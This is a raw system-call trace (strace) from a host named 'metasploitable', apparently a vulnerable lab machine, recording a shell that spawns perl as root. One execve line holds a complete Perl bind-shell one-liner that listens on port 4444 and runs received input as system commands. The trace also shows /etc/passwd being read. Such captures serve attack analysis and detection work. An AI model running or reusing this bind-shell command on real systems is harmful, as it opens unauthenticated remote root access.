10278 07:32:15.588011 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

10278 07:32:15.588025 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10278 07:32:15.588115 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

10278 07:32:15.588132 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7db6000

10278 07:32:15.588143 mmap2(0xb7dbf000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7dbf000

10278 07:32:15.588159 close(1)          = 0

10278 07:32:15.588180 munmap(0xb7f71000, 29913) = 0

10278 07:32:15.588196 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

10278 07:32:15.588211 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

10278 07:32:15.588222 _llseek(1, 0, [0], SEEK_CUR) = 0

10278 07:32:15.588234 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

10278 07:32:15.588250 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f78000

10278 07:32:15.588261 _llseek(1, 1624, [1624], SEEK_SET) = 0

10278 07:32:15.588276 munmap(0xb7f78000, 1624) = 0

10278 07:32:15.588286 close(1)          = 0

10278 07:32:15.588314 getpgrp()         = 3831

10278 07:32:15.588325 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

10278 07:32:15.588340 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

10278 07:32:15.588356 brk(0x8101000)    = 0x8101000

10278 07:32:15.588410 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10278 07:32:15.588442 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10278 07:32:15.588456 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10278 07:32:15.588493 brk(0x8102000)    = 0x8102000

10278 07:32:15.588520 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10278 07:32:15.588539 stat64("/sbin/AB", 0xbf80ce68) = -1 ENOENT (No such file or directory)

10278 07:32:15.588551 stat64("/bin/AB", 0xbf80ce68) = -1 ENOENT (No such file or directory)

10278 07:32:15.588563 stat64("/usr/sbin/AB", 0xbf80ce68) = -1 ENOENT (No such file or directory)

10278 07:32:15.588574 stat64("/usr/bin/AB", 0xbf80ce68) = -1 ENOENT (No such file or directory)

10278 07:32:15.588591 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10278 07:32:15.588606 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dec6f8) = 10279

10279 07:32:15.588657 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10279 07:32:15.588673 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10279 07:32:15.588686 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10279 07:32:15.588698 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10279 07:32:15.588714 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10279 07:32:15.588729 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10279 07:32:15.588742 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10279 07:32:15.588797 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

10279 07:32:15.588811 --- SIGPIPE (Broken pipe) @ 0 (0) ---

10279 07:32:15.588889 exit_group(127)   = ?

10278 07:32:15.609133 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10278 07:32:15.609133 --- SIGCHLD (Child exited) @ 0 (0) ---

4519  07:32:15.609133 waitpid(10278,  <unfinished ...>

10278 07:32:15.609133 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 10279

10278 07:32:15.609134 waitpid(-1, 0xbf80cae8, WNOHANG) = -1 ECHILD (No child processes)

10278 07:32:15.609134 sigreturn()       = ? (mask now [])

10278 07:32:15.609134 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10278 07:32:15.609134 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10278 07:32:15.609134 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10278 07:32:15.609135 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

10278 07:32:15.609135 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10278 07:32:15.609135 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

10278 07:32:15.609169 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10278 07:32:15.609189 stat64("/sbin/perl", 0xbf80ce98) = -1 ENOENT (No such file or directory)

10278 07:32:15.609202 stat64("/bin/perl", 0xbf80ce98) = -1 ENOENT (No such file or directory)

10278 07:32:15.609213 stat64("/usr/sbin/perl", 0xbf80ce98) = -1 ENOENT (No such file or directory)

10278 07:32:15.609225 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10278 07:32:15.609243 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10278 07:32:15.609268 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10278 07:32:15.609283 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7dec6f8) = 10280

10280 07:32:15.609343 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10280 07:32:15.609361 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10280 07:32:15.609374 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10280 07:32:15.609386 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10280 07:32:15.609401 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10280 07:32:15.609416 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10280 07:32:15.609429 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10280 07:32:15.609465 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

10280 07:32:15.609557 brk(0)            = 0x8153000

10280 07:32:15.609579 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10280 07:32:15.609594 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f4b000

10280 07:32:15.609610 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10280 07:32:15.609627 open("/etc/ld.so.cache", O_RDONLY) = 1

10280 07:32:15.609639 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10280 07:32:15.609656 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f43000

10280 07:32:15.609667 close(1)          = 0

10280 07:32:15.609678 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10280 07:32:15.609698 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10280 07:32:15.609712 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10280 07:32:15.609805 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10280 07:32:15.609822 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f3f000

10280 07:32:15.609845 mmap2(0xb7f41000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f41000

10280 07:32:15.609861 close(1)          = 0

10280 07:32:15.609873 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10280 07:32:15.609887 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

10280 07:32:15.609901 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

10280 07:32:15.609990 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

10280 07:32:15.610007 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f1a000

10280 07:32:15.610018 mmap2(0xb7f3d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f3d000

10280 07:32:15.610033 close(1)          = 0

10280 07:32:15.610045 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10280 07:32:15.610059 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

10280 07:32:15.610073 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

10280 07:32:15.610163 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

10280 07:32:15.610180 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f19000

10280 07:32:15.610193 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f01000

10280 07:32:15.610203 mmap2(0xb7f15000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f15000

10280 07:32:15.610219 mmap2(0xb7f17000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f17000

10280 07:32:15.610233 close(1)          = 0

10280 07:32:15.610244 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10280 07:32:15.610257 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10280 07:32:15.610271 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10280 07:32:15.610840 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10280 07:32:15.610978 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7db2000

10280 07:32:15.611042 mmap2(0xb7efb000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7efb000

10280 07:32:15.611083 mmap2(0xb7efe000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7efe000

10280 07:32:15.611113 close(1)          = 0

10280 07:32:15.611137 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10280 07:32:15.611156 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

10280 07:32:15.611170 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, \4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

10280 07:32:15.611264 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

10280 07:32:15.611281 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d80000

10280 07:32:15.611292 mmap2(0xb7d89000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d89000

10280 07:32:15.611307 mmap2(0xb7d8b000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d8b000

10280 07:32:15.611320 close(1)          = 0

10280 07:32:15.611343 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d7f000

10280 07:32:15.611356 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d7f8c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10280 07:32:15.611417 mprotect(0xb7efb000, 4096, PROT_READ) = 0

10280 07:32:15.611443 munmap(0xb7f43000, 29913) = 0

10280 07:32:15.611466 set_tid_address(0xb7d7f908) = 10280

10280 07:32:15.611476 set_robust_list(0xb7d7f910, 0xc) = 0

10280 07:32:15.611486 futex(0xbfe83320, 0x81 /* FUTEX_??? */, 1) = 0

10280 07:32:15.611500 rt_sigaction(SIGRTMIN, {0xb7f052c0, [], SA_SIGINFO}, NULL, 8) = 0

10280 07:32:15.611513 rt_sigaction(SIGRT_1, {0xb7f05340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

10280 07:32:15.611526 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

10280 07:32:15.611539 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

10280 07:32:15.611558 uname({sys="Linux", node="metasploitable", ...}) = 0

10280 07:32:15.611605 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

10280 07:32:15.611650 brk(0)            = 0x8153000

10280 07:32:15.611660 brk(0x8174000)    = 0x8174000

10280 07:32:15.611710 getuid32()        = 0

10280 07:32:15.611719 geteuid32()       = 0

10280 07:32:15.611729 getgid32()        = 0

10280 07:32:15.611737 getegid32()       = 0

10280 07:32:15.611774 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d5e000

10280 07:32:15.611801 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

10280 07:32:15.611818 read(1, "\20\301\3i", 4) = 4

10280 07:32:15.611831 close(1)          = 0

10280 07:32:15.611850 time(NULL)        = 1495625535

10280 07:32:15.611894 stat64("/usr/local/lib/site_perl/5.8.8/i486-linux-gnu-thread-multi", 0xbfe82ff0) = -1 ENOENT (No such file or directory)

10280 07:32:15.611911 stat64("/usr/local/lib/site_perl/5.8.8", 0xbfe82ff0) = -1 ENOENT (No such file or directory)

10280 07:32:15.611924 stat64("/usr/local/lib/site_perl/i486-linux-gnu-thread-multi", 0xbfe82ff0) = -1 ENOENT (No such file or directory)

10280 07:32:15.611940 stat64("/usr/local/lib/perl/5.8.7", 0xbfe83130) = -1 ENOENT (No such file or directory)

10280 07:32:15.611961 stat64("/usr/local/share/perl/5.8.7", 0xbfe83130) = -1 ENOENT (No such file or directory)

10280 07:32:15.611974 stat64("/usr/local/lib/perl/5.8.6", 0xbfe83130) = -1 ENOENT (No such file or directory)

10280 07:32:15.611986 stat64("/usr/local/share/perl/5.8.6", 0xbfe83130) = -1 ENOENT (No such file or directory)

10280 07:32:15.611998 stat64("/usr/local/lib/perl/5.8.4", 0xbfe83130) = -1 ENOENT (No such file or directory)

10280 07:32:15.612009 stat64("/usr/local/share/perl/5.8.4", 0xbfe83130) = -1 ENOENT (No such file or directory)

10280 07:32:15.612021 stat64("/usr/local/lib/perl/5.8.3", 0xbfe83130) = -1 ENOENT (No such file or directory)

10280 07:32:15.612032 stat64("/usr/local/share/perl/5.8.3", 0xbfe83130) = -1 ENOENT (No such file or directory)

10280 07:32:15.612044 stat64("/usr/local/lib/perl/5.8.2", 0xbfe83130) = -1 ENOENT (No such file or directory)

10280 07:32:15.612056 stat64("/usr/local/share/perl/5.8.2", 0xbfe83130) = -1 ENOENT (No such file or directory)

10280 07:32:15.612068 stat64("/usr/local/lib/perl/5.8.1", 0xbfe83130) = -1 ENOENT (No such file or directory)

10280 07:32:15.612079 stat64("/usr/local/share/perl/5.8.1", 0xbfe83130) = -1 ENOENT (No such file or directory)

10280 07:32:15.612095 stat64("/usr/local/lib/perl/5.8.0", 0xbfe83130) = -1 ENOENT (No such file or directory)

10280 07:32:15.612107 stat64("/usr/local/share/perl/5.8.0", 0xbfe83130) = -1 ENOENT (No such file or directory)

10280 07:32:15.612130 ioctl(0, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfe82e28) = -1 ENOTTY (Inappropriate ioctl for device)

10280 07:32:15.612143 _llseek(0, 0, [0], SEEK_CUR) = 0

10280 07:32:15.612155 ioctl(1, SNDCTL_TMR_TIMEBASE or TCGETS, 0xbfe82e28) = -1 EBADF (Bad file descriptor)

